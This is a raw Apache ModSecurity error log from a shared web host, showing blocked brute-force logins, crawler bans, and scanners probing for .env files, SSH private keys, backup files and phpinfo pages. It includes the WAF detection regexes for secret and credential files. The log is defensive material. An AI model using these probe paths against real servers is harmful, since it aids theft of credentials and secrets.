[Tue May 26 14:52:55.266139 2026] [security2:error] [pid 658374:tid 658553] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmb51Mb7_aby-E0KcmbwAAADE"], referer: https://www.anujtradingco.com/
[Tue May 26 14:52:55.952518 2026] [security2:error] [pid 658374:tid 658563] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmb51Mb7_aby-E0KcmfwAAADs"]
[Tue May 26 14:52:57.105680 2026] [security2:error] [pid 658374:tid 658624] [client 138.229.103.255:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmcZ1Mb7_aby-E0KcmqQAAAHg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467557&moderation-hash=40b05860cbdd81bd5ae1c154b8d08af4
[Tue May 26 14:52:57.906359 2026] [autoindex:error] [pid 658374:tid 658510] [client 137.184.81.51:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:57.939720 2026] [security2:error] [pid 658374:tid 658523] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmcZ1Mb7_aby-E0KcmtgAAABM"]
[Tue May 26 14:52:58.062075 2026] [autoindex:error] [pid 658374:tid 658525] [client 137.184.81.51:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:58.203226 2026] [security2:error] [pid 658374:tid 658462] [remote 85.215.36.85:45274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVmcp1Mb7_aby-E0KcmyQAAF1c"]
[Tue May 26 14:53:00.100177 2026] [security2:error] [pid 658374:tid 658595] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmc51Mb7_aby-E0KcnDQAAAFs"]
[Tue May 26 14:53:02.520894 2026] [security2:error] [pid 658374:tid 658573] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmdp1Mb7_aby-E0KcnVgAAAEU"]
[Tue May 26 14:53:04.687838 2026] [security2:error] [pid 658374:tid 658524] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmeJ1Mb7_aby-E0KcnjQAAABQ"]
[Tue May 26 14:53:05.813811 2026] [security2:error] [pid 658374:tid 658600] [client 114.119.129.113:39215] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/influencer-marketing-simplified"] [unique_id "ahVmeZ1Mb7_aby-E0KcnwQAAAGA"], referer: http://moes-art.com/blog/page/2
[Tue May 26 14:53:06.395876 2026] [security2:error] [pid 658374:tid 658562] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmeZ1Mb7_aby-E0KcnyQAAADo"]
[Tue May 26 14:53:07.980296 2026] [security2:error] [pid 658374:tid 658546] [client 88.13.236.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVme51Mb7_aby-E0KcoCQAAACo"]
[Tue May 26 14:53:09.266004 2026] [security2:error] [pid 658374:tid 658628] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmfJ1Mb7_aby-E0KcoMwAAAHw"]
[Tue May 26 14:53:09.441009 2026] [security2:error] [pid 658374:tid 658430] [remote 178.104.90.233:53622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVmfZ1Mb7_aby-E0KcoRwAAGzc"]
[Tue May 26 14:53:09.767097 2026] [security2:error] [pid 658374:tid 658524] [client 114.119.150.166:31677] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVmfZ1Mb7_aby-E0KcoXAAAABQ"], referer: https://glorodavionics.com?route=product/product&path=72_79_130&product_id=176
[Tue May 26 14:53:10.171319 2026] [security2:error] [pid 658374:tid 658379] [remote 74.7.241.58:54584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVmfp1Mb7_aby-E0KcoaQAAAwQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:53:11.092089 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmfp1Mb7_aby-E0KcohAAAABo"]
[Tue May 26 14:53:12.560986 2026] [security2:error] [pid 658374:tid 658524] [client 85.121.127.3:40438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/app/.env"] [unique_id "ahVmgJ1Mb7_aby-E0KcozwAAABQ"]
[Tue May 26 14:53:12.561928 2026] [security2:error] [pid 658374:tid 658607] [client 85.121.127.3:40318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0QAAAGc"]
[Tue May 26 14:53:12.562183 2026] [security2:error] [pid 658374:tid 658573] [client 85.121.127.3:40432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/api/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0AAAAEU"]
[Tue May 26 14:53:12.565196 2026] [security2:error] [pid 658374:tid 658601] [client 85.121.127.3:40424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.old"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3wAAAGE"]
[Tue May 26 14:53:12.565439 2026] [security2:error] [pid 658374:tid 658584] [client 85.121.127.3:40442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmgJ1Mb7_aby-E0KcoxwAAAFA"]
[Tue May 26 14:53:12.565614 2026] [security2:error] [pid 658374:tid 658556] [client 85.121.127.3:40422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3QAAADQ"]
[Tue May 26 14:53:12.566606 2026] [security2:error] [pid 658374:tid 658576] [client 85.121.127.3:40440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/public/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco5QAAAEg"]
[Tue May 26 14:53:12.567015 2026] [security2:error] [pid 658374:tid 658549] [client 85.121.127.3:40410] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env"] [unique_id "ahVmgJ1Mb7_aby-E0Kco3gAAAC0"]
[Tue May 26 14:53:12.568688 2026] [security2:error] [pid 658374:tid 658552] [client 85.121.127.3:40446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmgJ1Mb7_aby-E0Kco5wAAADA"]
[Tue May 26 14:53:12.574302 2026] [security2:error] [pid 658374:tid 658580] [client 85.121.127.3:40420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVmgJ1Mb7_aby-E0Kco0wAAAEw"]
[Tue May 26 14:53:12.958379 2026] [http2:info] [pid 662057:tid 662057] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:53:14.651011 2026] [security2:error] [pid 662057:tid 662187] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmgPT3lMm9tGFVg9RIWQAAAQo"]
[Tue May 26 14:53:16.085276 2026] [security2:error] [pid 658374:tid 658593] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmg51Mb7_aby-E0KcpYgAAAFk"]
[Tue May 26 14:53:16.156563 2026] [security2:error] [pid 658374:tid 658391] [remote 178.104.90.233:46940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVmhJ1Mb7_aby-E0KcpbQAAHxA"]
[Tue May 26 14:53:18.405009 2026] [security2:error] [pid 658374:tid 658543] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmhZ1Mb7_aby-E0KcppQAAACc"]
[Tue May 26 14:53:20.465489 2026] [security2:error] [pid 658374:tid 658584] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmiJ1Mb7_aby-E0Kcp_gAAAFA"]
[Tue May 26 14:53:22.320859 2026] [security2:error] [pid 658374:tid 658592] [client 173.239.254.131:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVmh51Mb7_aby-E0Kcp4wAAWD8"]
[Tue May 26 14:53:22.321188 2026] [security2:error] [pid 658374:tid 658624] [client 185.191.171.16:62434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVmip1Mb7_aby-E0KcqNwAAAHg"]
[Tue May 26 14:53:22.321333 2026] [security2:error] [pid 658374:tid 658624] [client 185.191.171.16:62434] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVmip1Mb7_aby-E0KcqNwAAAHg"]
[Tue May 26 14:53:22.870648 2026] [security2:error] [pid 662057:tid 662241] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmivT3lMm9tGFVg9RIwgAAAUA"]
[Tue May 26 14:53:23.298083 2026] [core:error] [pid 658374:tid 658583] [client 5.255.231.66:40382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:53:23.298114 2026] [core:error] [pid 658374:tid 658583] [client 5.255.231.66:40382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:53:24.869574 2026] [security2:error] [pid 662057:tid 662195] [client 20.12.194.227:28766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9AAAARI"]
[Tue May 26 14:53:24.869699 2026] [security2:error] [pid 662057:tid 662195] [client 20.12.194.227:28766] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.jiyani.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9AAAARI"]
[Tue May 26 14:53:24.962154 2026] [security2:error] [pid 658374:tid 658521] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmjJ1Mb7_aby-E0KcqYAAAABE"]
[Tue May 26 14:53:24.998391 2026] [security2:error] [pid 662057:tid 662243] [client 20.12.194.227:13666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.jiyani.in"] [uri "/about.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9QAAAUI"]
[Tue May 26 14:53:24.998504 2026] [security2:error] [pid 662057:tid 662243] [client 20.12.194.227:13666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.jiyani.in"] [uri "/about.php"] [unique_id "ahVmjPT3lMm9tGFVg9RI9QAAAUI"]
[Tue May 26 14:53:25.545668 2026] [security2:error] [pid 662057:tid 662259] [client 74.249.173.207:4825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/wk/index.php"] [unique_id "ahVmjfT3lMm9tGFVg9RJAQAAAVI"]
[Tue May 26 14:53:27.112154 2026] [autoindex:error] [pid 658374:tid 658589] [client 45.148.10.204:34814] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:53:27.480743 2026] [security2:error] [pid 658374:tid 658546] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmj51Mb7_aby-E0KcqkAAAACo"]
[Tue May 26 14:53:27.614603 2026] [security2:error] [pid 658374:tid 658612] [client 213.209.159.175:56884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/.env"] [unique_id "ahVmj51Mb7_aby-E0KcqnAAAAGw"]
[Tue May 26 14:53:27.812903 2026] [security2:error] [pid 662057:tid 662255] [client 74.249.173.207:4814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/inputs.php"] [unique_id "ahVmj_T3lMm9tGFVg9RJFAAAAU4"]
[Tue May 26 14:53:28.057354 2026] [security2:error] [pid 662057:tid 662291] [client 213.209.159.175:56888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/api/.env"] [unique_id "ahVmkPT3lMm9tGFVg9RJFQAAAXI"]
[Tue May 26 14:53:28.515265 2026] [security2:error] [pid 658374:tid 658571] [client 213.209.159.175:56890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/backend/.env"] [unique_id "ahVmkJ1Mb7_aby-E0KcqsQAAAEM"]
[Tue May 26 14:53:28.529843 2026] [security2:error] [pid 658374:tid 658529] [client 14.179.170.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkJ1Mb7_aby-E0KcqqQAAABk"]
[Tue May 26 14:53:29.033133 2026] [security2:error] [pid 658374:tid 658540] [client 213.209.159.175:56892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "162.215.241.212"] [uri "/phpinfo.php"] [unique_id "ahVmkJ1Mb7_aby-E0KcquQAAACQ"]
[Tue May 26 14:53:29.271582 2026] [security2:error] [pid 662057:tid 662310] [client 74.249.173.207:4806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/ioxi-o.php"] [unique_id "ahVmkfT3lMm9tGFVg9RJIgAAAYU"]
[Tue May 26 14:53:29.673195 2026] [security2:error] [pid 658374:tid 658548] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkZ1Mb7_aby-E0KcqvQAAACw"]
[Tue May 26 14:53:31.183616 2026] [security2:error] [pid 658374:tid 658581] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmkp1Mb7_aby-E0Kcq1AAAAE0"]
